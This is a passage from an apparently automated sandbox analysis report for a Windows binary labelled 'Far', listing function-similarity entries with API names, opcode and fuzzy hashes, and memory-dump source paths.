                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: lstrcmpilstrcpylstrlen
                                                                                                                                                                      • String ID: cdecl
                                                                                                                                                                      • API String ID: 4031866154-3896280584
                                                                                                                                                                      • Opcode ID: 0485784f21c04be767ae28bc46fcd490e4a128233be48af30b13b3ba25d98f45
                                                                                                                                                                      • Instruction ID: 7d3ba95a8ccfa14fd4fd5381eaad42330e38f22a88641f0a9ccede5dc1b9fbb1
                                                                                                                                                                      • Opcode Fuzzy Hash: 0485784f21c04be767ae28bc46fcd490e4a128233be48af30b13b3ba25d98f45
                                                                                                                                                                      • Instruction Fuzzy Hash: AE218D3170C38A96EA14EF96A594278B361EF99F90BC84134DA6E4B790EF7CE451D310
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseCurrentHandleMessageObjectSingleThreadWait_invalid_parameter_noinfo
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2979156933-0
                                                                                                                                                                      • Opcode ID: 2908eae6717fe1b20f4e8c5065737de368b6f1e2bf6071d739568695d09c6b62
                                                                                                                                                                      • Instruction ID: 7af930a401c7cb4fa3e84cdd526cc94777e88c2a43c757b5dd2659074feaa0d8
                                                                                                                                                                      • Opcode Fuzzy Hash: 2908eae6717fe1b20f4e8c5065737de368b6f1e2bf6071d739568695d09c6b62
                                                                                                                                                                      • Instruction Fuzzy Hash: 5121F632B0CB8696E750EB66B88026AF791BB84BD0F844135EA9D43B59EF7CD0499710
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _ctrlfp
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 697997973-0
                                                                                                                                                                      • Opcode ID: f8f9840fc4997b7b72a1294ff11ed33c51b2b96051fe15eb5033c25f68ffb0cf
                                                                                                                                                                      • Instruction ID: 4319caae10dc9cdbe648fa7c53c51da049fa7360e7ca5641f94a0ee2c55eca07
                                                                                                                                                                      • Opcode Fuzzy Hash: f8f9840fc4997b7b72a1294ff11ed33c51b2b96051fe15eb5033c25f68ffb0cf
                                                                                                                                                                      • Instruction Fuzzy Hash: BC11F622D4CA4A92E650AA78954107BE371FF9AB80FA44234F7994E659EF3DE4409B10
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Type$Register$FileLoadModuleNameUser
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1352324309-0
                                                                                                                                                                      • Opcode ID: f9d03fec68b5b4c6966c658b6da3f2c91de90fd0719e6c9be6d29f0b3145b0df
                                                                                                                                                                      • Instruction ID: a753354d4899d96b808be4693d653bf1adc24447d5a305992f6c43188d4aca60
                                                                                                                                                                      • Opcode Fuzzy Hash: f9d03fec68b5b4c6966c658b6da3f2c91de90fd0719e6c9be6d29f0b3145b0df
                                                                                                                                                                      • Instruction Fuzzy Hash: 6D1182A2B0C94692E7209FA5E488369B3A0FB84F48FE44135C64D9B544EF7DD544EB60
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,00007FF73D069360,?,?,Line %d: ,00007FF73D06DE7D), ref: 00007FF73D07BD12
                                                                                                                                                                      • SetLastError.KERNEL32(?,?,?,00007FF73D069360,?,?,Line %d: ,00007FF73D06DE7D), ref: 00007FF73D07BD7A
                                                                                                                                                                      • SetLastError.KERNEL32(?,?,?,00007FF73D069360,?,?,Line %d: ,00007FF73D06DE7D), ref: 00007FF73D07BD90
                                                                                                                                                                      • abort.LIBCMT ref: 00007FF73D07BD96
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorLast$abort
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1447195878-0
                                                                                                                                                                      • Opcode ID: bc8646eea5e2037c6ae74e592a82b15fd2acbf2a3002881bddbbfccc1809cbe6
                                                                                                                                                                      • Instruction ID: 256f99fab7f58f9ed0f18722fa180c4ae779d13d19336ef8f62201056b89edf1
                                                                                                                                                                      • Opcode Fuzzy Hash: bc8646eea5e2037c6ae74e592a82b15fd2acbf2a3002881bddbbfccc1809cbe6
                                                                                                                                                                      • Instruction Fuzzy Hash: 8F016920E0D24F62FA6AB7E0A59A27D92515F44F80FD40438E91E0A7D6FF3CE8146220
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CounterPerformanceQuerySleep
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2875609808-0
                                                                                                                                                                      • Opcode ID: 226b216ee8c36923cb07a4aaa192afbee87128cb84dd0baf04db96e24dfa3774
                                                                                                                                                                      • Instruction ID: 419f149691a403fb237d00a3f87df6ab63ebd88fce22e4a281a90f1758805bf4
                                                                                                                                                                      • Opcode Fuzzy Hash: 226b216ee8c36923cb07a4aaa192afbee87128cb84dd0baf04db96e24dfa3774
                                                                                                                                                                      • Instruction Fuzzy Hash: 08012D60A0CF4B62EA156B75A4802BFF374BF99F51F840331E98F61560EF3DE4819620
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1539411459-0
                                                                                                                                                                      • Opcode ID: 0dacb98fa7afff2f581cc1466db00cfcbd5c823df3e24bd0ee35935fb80ad810
                                                                                                                                                                      • Instruction ID: dd113c0647b7851ca7ee9a785b0156072138a47271b5bbf6e69142b30ca4fd5a
                                                                                                                                                                      • Opcode Fuzzy Hash: 0dacb98fa7afff2f581cc1466db00cfcbd5c823df3e24bd0ee35935fb80ad810
                                                                                                                                                                      • Instruction Fuzzy Hash: 2E01DE31A1C3AA52E740AB55F808768BB60BB81F94FA80130CE4903BA1DF7EE445CB10
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2889604237-0
                                                                                                                                                                      • Opcode ID: 8bfbaac5f8ac3ae270764ec4ca97337265fec3d044a70584e26ef594fe531149
                                                                                                                                                                      • Instruction ID: e1f49749f27ac533a0e78fc94174266c3c8d2190d9765d5b573c37c2e0982c53
                                                                                                                                                                      • Opcode Fuzzy Hash: 8bfbaac5f8ac3ae270764ec4ca97337265fec3d044a70584e26ef594fe531149
                                                                                                                                                                      • Instruction Fuzzy Hash: 31E01A60A0E31A96EA04BBA2995C27CA76AEF48FC5F904430CC0E03B52FF3DA0446360
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2889604237-0
                                                                                                                                                                      • Opcode ID: 6a869403300693b6f2669fb3316bbe4ae3126b26ff02dccb5b78957836818f65
                                                                                                                                                                      • Instruction ID: 07b6909f88600fa588ea213c1e08ab2c939894683b9ebe5f03e89fdfa8f4d518
                                                                                                                                                                      • Opcode Fuzzy Hash: 6a869403300693b6f2669fb3316bbe4ae3126b26ff02dccb5b78957836818f65
                                                                                                                                                                      • Instruction Fuzzy Hash: E0E04F60B0E31A96EA04FBA1995C17CA75AEF49FC5F900430CD0E03752FF3DA004A350
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                      • String ID: e+000$gfff
                                                                                                                                                                      • API String ID: 3215553584-3030954782
                                                                                                                                                                      • Opcode ID: 451edc7dc45f6f0e73442d5906206404fca751a69d5befb6050b9a7d654a89b8
                                                                                                                                                                      • Instruction ID: da569831502f29b9c09a9a8ea2d24ad073cc330a28102c18a7559c5431874760
                                                                                                                                                                      • Opcode Fuzzy Hash: 451edc7dc45f6f0e73442d5906206404fca751a69d5befb6050b9a7d654a89b8
                                                                                                                                                                      • Instruction Fuzzy Hash: BD515962B1C7CA96E7259F799940379AB91E780F90F888235C7AC4BBC5EF2CD045D720
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                                                                                                      • String ID: static
                                                                                                                                                                      • API String ID: 1983116058-2160076837
                                                                                                                                                                      • Opcode ID: 95df86c0b5be465e67b46f67681313679853ff0d2c7002b48658bb3085041fab
                                                                                                                                                                      • Instruction ID: 48addda25696dfdd120f1a62434d89fdb6ca4208adb70fe2291cfc3ba24d914b
                                                                                                                                                                      • Opcode Fuzzy Hash: 95df86c0b5be465e67b46f67681313679853ff0d2c7002b48658bb3085041fab
                                                                                                                                                                      • Instruction Fuzzy Hash: 20314D32A09785CBD324DF69E44479AB7A5F788B50F504239EB9943B98DB38E451CF10
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Internet$OpenOption
                                                                                                                                                                      • String ID: <local>
                                                                                                                                                                      • API String ID: 942729171-4266983199
                                                                                                                                                                      • Opcode ID: 6ab2705bd24d3b36ee043a8bab6b4fe71ecd08aa6a726eb29b0bce210f6b7ad3
                                                                                                                                                                      • Instruction ID: a8d52bb61b8909e1ea8fc69ea2e615d69296d0ab17d8a77b9450663ab3ba9325
                                                                                                                                                                      • Opcode Fuzzy Hash: 6ab2705bd24d3b36ee043a8bab6b4fe71ecd08aa6a726eb29b0bce210f6b7ad3
                                                                                                                                                                      • Instruction Fuzzy Hash: 0511C436A1D68592E7609B55E0003FDA7B1EB80B44FE44031DA8D0BA98EF3DD88ADB11
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _ctrlfp_handle_error_raise_exc
                                                                                                                                                                      • String ID: !$tan
                                                                                                                                                                      • API String ID: 3384550415-2428968949
                                                                                                                                                                      • Opcode ID: 37358dfb2328ba0d69936a848ea2b5fd0e9465859927029d04ee5f2a820ecc06
                                                                                                                                                                      • Instruction ID: 5c7847319511e877ba79a95a684e191a6d815a15283280121364ba5cbe78ff18
                                                                                                                                                                      • Opcode Fuzzy Hash: 37358dfb2328ba0d69936a848ea2b5fd0e9465859927029d04ee5f2a820ecc06
                                                                                                                                                                      • Instruction Fuzzy Hash: 5C019232A1CB8942DA14DF52E44037AA2A1FF9ABD4F904334EA5D07B88FF7CD1549B00
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _ctrlfp_handle_error_raise_exc
                                                                                                                                                                      • String ID: !$sin
                                                                                                                                                                      • API String ID: 3384550415-1565623160
                                                                                                                                                                      • Opcode ID: a78541dead3ff30dfa742dfe4f37c9ce4d8b9887772b712caad6f538efdda69f
                                                                                                                                                                      • Instruction ID: 3f1dbbc8a583b529e4cb6f591de0d57f3b45417b8572cdb88898a2d859d0d55c
                                                                                                                                                                      • Opcode Fuzzy Hash: a78541dead3ff30dfa742dfe4f37c9ce4d8b9887772b712caad6f538efdda69f
                                                                                                                                                                      • Instruction Fuzzy Hash: 0901B172A1CB8942DA14DF22E44036AA2A1FF9ABD4F904324E95907B88FF7CD1949B00
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _ctrlfp_handle_error_raise_exc
                                                                                                                                                                      • String ID: !$cos
                                                                                                                                                                      • API String ID: 3384550415-1949035351
                                                                                                                                                                      • Opcode ID: 350a42a1b96fc6731041036cd31bb491d476e6ce982f7f2f32e322f90c53a453
                                                                                                                                                                      • Instruction ID: 13e3ea85df9f747455a49bdcc6a4a19c4b74d47776feea4343c4b14e95c2abb2
                                                                                                                                                                      • Opcode Fuzzy Hash: 350a42a1b96fc6731041036cd31bb491d476e6ce982f7f2f32e322f90c53a453
                                                                                                                                                                      • Instruction Fuzzy Hash: 2701B572A1CB8942D614DF12E440366A161FF9ABD4F904324E95907B88FF7CD1559B00
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _handle_error
                                                                                                                                                                      • String ID: "$exp
                                                                                                                                                                      • API String ID: 1757819995-2878093337
                                                                                                                                                                      • Opcode ID: aa3f926570ffec19a89465bdd3fd23e560968e9bf7166b0203cb1c46ef2cb1cd
                                                                                                                                                                      • Instruction ID: 8553144bc727635ff5645e39cc50a05c441d5f94d95ef1b29148b048ae56a60d
                                                                                                                                                                      • Opcode Fuzzy Hash: aa3f926570ffec19a89465bdd3fd23e560968e9bf7166b0203cb1c46ef2cb1cd
                                                                                                                                                                      • Instruction Fuzzy Hash: 5D01C83692CB8C83E220DF24D0492AAB6B1FFEA744F601315E78416664DBBDD0859F00
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      • try_get_function.LIBVCRUNTIME ref: 00007FF73D067B79
